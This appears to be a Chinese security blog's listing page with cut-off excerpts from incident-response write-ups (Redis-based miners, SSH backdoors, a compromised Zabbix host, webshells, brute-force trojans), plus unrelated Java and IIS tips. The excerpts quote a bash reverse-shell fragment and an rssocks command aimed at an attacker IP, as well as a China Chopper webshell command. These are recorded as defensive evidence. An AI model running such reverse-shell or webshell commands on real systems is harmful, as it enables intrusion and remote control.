-
0x01 背景
本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最后一次应急...
-
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。
排查过程
检查进程发现SSH后门
[root@testserver tmp]# ps aux | grep 2345 | grep -v grep
root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345
[root@testserver tmp]# lsof -p 13587...
-
一哥们反应自己的测试机器总是关机,联系云主机客服得知服务器总是大量发包,导致技术关停该机器。
排查过程
Last查看登录记录
查找到一个可疑IP
[root@i-9kp9tipm dpkgd]# grep "1.180.212.21" /var/log/secure*
/var/log/secure-20170409:Apr 4 22:20:43 i-9kp...
-
03-26
0x01 背景
2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。
0x02 排查过程
ps查看进程,发现端口反弹行为
Bash反弹:/dev/tcp/107.151.149.242/82 0>&1
Python反弹:rssocks -s 107.151.149.242:1080
查看进程启动时间发现为Feb 27,启动账...
-
03-26
0x01 排查过程
11:10看到主机监控告警,告警内容为
cd "/usr/local/web/cdksw/general-tomcat-6.0.18/webapps/background/background/upload/";ver;echo [S];pwd;echo [E]
看内容就是菜刀马执行,看目录发现是upload可以猜测是文件上传的问题。受影响的是...
-
03-26
0x01 排查过程
异常进程发现:
/usr/bin/.sshd
[kworker95]
在开机启动中发现:
/tmp下的异常文件
异常的网络连接
使用lsof的时候发现返回内容不正常,查看下lsof
mtime为10:46,并且大小不正常,很明显命令被替换了。
看下/usr/bin/下
/use/sbin下
...
-
03-26
某日哥们的负责的服务器因为SSH弱口令被黑了(又是边界安全意识的问题),看到异常的进程信息如下:
lsof看一下打开的文件,发现/dev/g下存在这些东西
然后习惯性的按照时间排序查看一下命令,因为root已经被拿了所以非常有可能已经修改了命令。然后看到...
-
03-26
中毒现象:
内到外的流量大,打DDOS
入侵方式:
通过SSH暴力破解
病毒分析:
木马病毒在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令。杀死该进程后,会再随机产生一个新的进程,删除这些木马文件后,会再重新生成新...
-
02-22
OOM(OutOfMemoryError) 问题归根结底三点原因:
本身资源不够
申请的内存太多
资源耗尽
解决思路,换成Java服务分析,三个原因也可以解读为:
有可能是内存分配确实过小,而正常业务使用了大量内存
某一个对象被频繁申请,却没有释...
-
02-13
解决IIS无法启动w3svc,供大家参考,具体内容如下
1)、首先在CMD命令行中输入:fsutil resource setautoreset true c:\
2)、然后在运行services.msc
3)、找到Windows Process Activation Service服务 启动该服务,启动类型:自动
4)、继续找到World Wi...
0x01 背景 本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最后一次应急...
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 排查过程 检查进程发现SSH后门 [root@testserver tmp]# ps aux | grep 2345 | grep -v grep root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345 [root@testserver tmp]# lsof -p 13587...
一哥们反应自己的测试机器总是关机,联系云主机客服得知服务器总是大量发包,导致技术关停该机器。 排查过程 Last查看登录记录 查找到一个可疑IP [root@i-9kp9tipm dpkgd]# grep "1.180.212.21" /var/log/secure* /var/log/secure-20170409:Apr 4 22:20:43 i-9kp...
0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 Bash反弹:/dev/tcp/107.151.149.242/82 0>&1 Python反弹:rssocks -s 107.151.149.242:1080 查看进程启动时间发现为Feb 27,启动账...
OOM(OutOfMemoryError) 问题归根结底三点原因: 本身资源不够 申请的内存太多 资源耗尽 解决思路,换成Java服务分析,三个原因也可以解读为: 有可能是内存分配确实过小,而正常业务使用了大量内存 某一个对象被频繁申请,却没有释...
解决IIS无法启动w3svc,供大家参考,具体内容如下 1)、首先在CMD命令行中输入:fsutil resource setautoreset true c:\ 2)、然后在运行services.msc 3)、找到Windows Process Activation Service服务 启动该服务,启动类型:自动 4)、继续找到World Wi...
